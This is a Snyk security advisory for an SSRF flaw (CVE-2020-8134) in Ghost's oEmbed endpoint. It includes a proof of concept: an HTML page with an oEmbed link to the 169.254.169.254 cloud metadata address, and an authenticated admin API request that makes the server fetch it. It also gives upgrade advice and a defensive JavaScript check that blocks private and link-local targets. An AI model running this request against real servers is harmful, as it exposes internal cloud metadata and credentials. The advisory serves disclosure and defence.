Server Side Request Forgery (SSRF) Affecting ghost package, versions <2.38.1 >=3.0.0 <3.10.0
Threat Intelligence
Exploit Maturity: Proof of concept
EPSS: 0.08% (36th percentile)
- Snyk ID SNYK-JS-GHOST-559536
- published 9 Mar 2020
- disclosed 9 Mar 2020
- credit whoareme
Introduced: 9 Mar 2020
CVE-2020-8134
How to fix?
Upgrade ghost to version 2.38.1, 3.10.0 or higher.
Overview
ghost is a publishing platform.
Affected versions of this package are vulnerable to Server Side Request Forgery (SSRF). The getOembedUrlFromHTML() function does not sanitize user input: the oEmbed discovery link it extracts from a fetched page is followed without being validated, so it can point the server at internal addresses.
PoC by whoareme
First of all, we should create an HTML page with a link[type="application/json+oembed"] pointing at the malicious URL which we would like to discover:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Security Testing</title>
<link rel="alternate" type="application/json+oembed" href="http://169.254.169.254/metadata/v1.json"/>
</head>
<body></body>
</html>
And serve this page with the Python SimpleHTTPServer module:
python -m SimpleHTTPServer 8000
Send the following request with publisher Cookies:
GET /ghost/api/v3/admin/oembed/?url=http://169.254.169.254/metadata/v1.json&type=embed HTTP/1.1
Host: YOUR_WEBSITE
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 3.5
App-Pragma: no-cache
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US;
Cookie: ghost-admin-api-session=YOUR_SESSION
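As an added example (not Ghost's own code, and not the fix shipped in 2.38.1 / 3.10.0), here is a defender-side version of the step the advisory describes: extract the oEmbed discovery link from fetched HTML, then refuse targets whose host falls in loopback, private or link-local ranges such as the 169.254.169.254 metadata address used in the PoC above. The function names and the sample page are assumptions made for this illustration.

```javascript
// Added example, not Ghost's own code: extract the oEmbed discovery link
// the way an oembed endpoint would, then refuse targets that point at
// loopback, private or link-local (cloud metadata) addresses. A real
// deployment must also resolve the hostname and check the resulting IPs
// (DNS rebinding) and re-run the check after every redirect.

// Constructed sample page mirroring the PoC above.
const SAMPLE_HTML = `<!DOCTYPE html><html><head>
<link rel="alternate" type="application/json+oembed"
      href="http://169.254.169.254/metadata/v1.json"/>
</head><body></body></html>`;

// Return the href of the first <link type="application/json+oembed"> tag.
function getOembedUrlFromHTML(html) {
  for (const [tag] of html.matchAll(/<link\b[^>]*>/gi)) {
    if (!/type\s*=\s*["']application\/json\+oembed["']/i.test(tag)) continue;
    const m = tag.match(/href\s*=\s*["']([^"']+)["']/i);
    if (m) return m[1];
  }
  return null;
}

// IPv4 literal in a range that must never be fetched on a user's behalf:
// 0/8, loopback, RFC 1918 and link-local 169.254/16 (cloud metadata).
function isPrivateIPv4(ip) {
  const p = ip.split('.').map(Number);
  if (p.length !== 4 || p.some(n => !Number.isInteger(n) || n < 0 || n > 255)) return false;
  return p[0] === 0 || p[0] === 10 || p[0] === 127 ||
    (p[0] === 172 && p[1] >= 16 && p[1] <= 31) ||
    (p[0] === 192 && p[1] === 168) ||
    (p[0] === 169 && p[1] === 254);
}

// True only for http(s) URLs whose host is not an internal address. The WHATWG
// parser normalises decimal/hex IPv4 forms (http://2852039166/) to dotted quads.
function isSafeOembedTarget(raw) {
  let u;
  try { u = new URL(raw); } catch { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  const host = u.hostname.replace(/^\[|\]$/g, '').toLowerCase();
  if (host === 'localhost' || host.endsWith('.localhost')) return false;
  if (host.includes(':')) {  // IPv6 literal
    // Reject loopback, unspecified, link-local, unique-local and (conservatively) IPv4-mapped.
    return !(host === '::1' || host === '::' || host.startsWith('fe80:') ||
             /^f[cd]/.test(host) || host.startsWith('::ffff:'));
  }
  if (/^\d+\.\d+\.\d+\.\d+$/.test(host)) return !isPrivateIPv4(host);
  return true;  // a hostname: must still be resolved and re-checked by IP
}
```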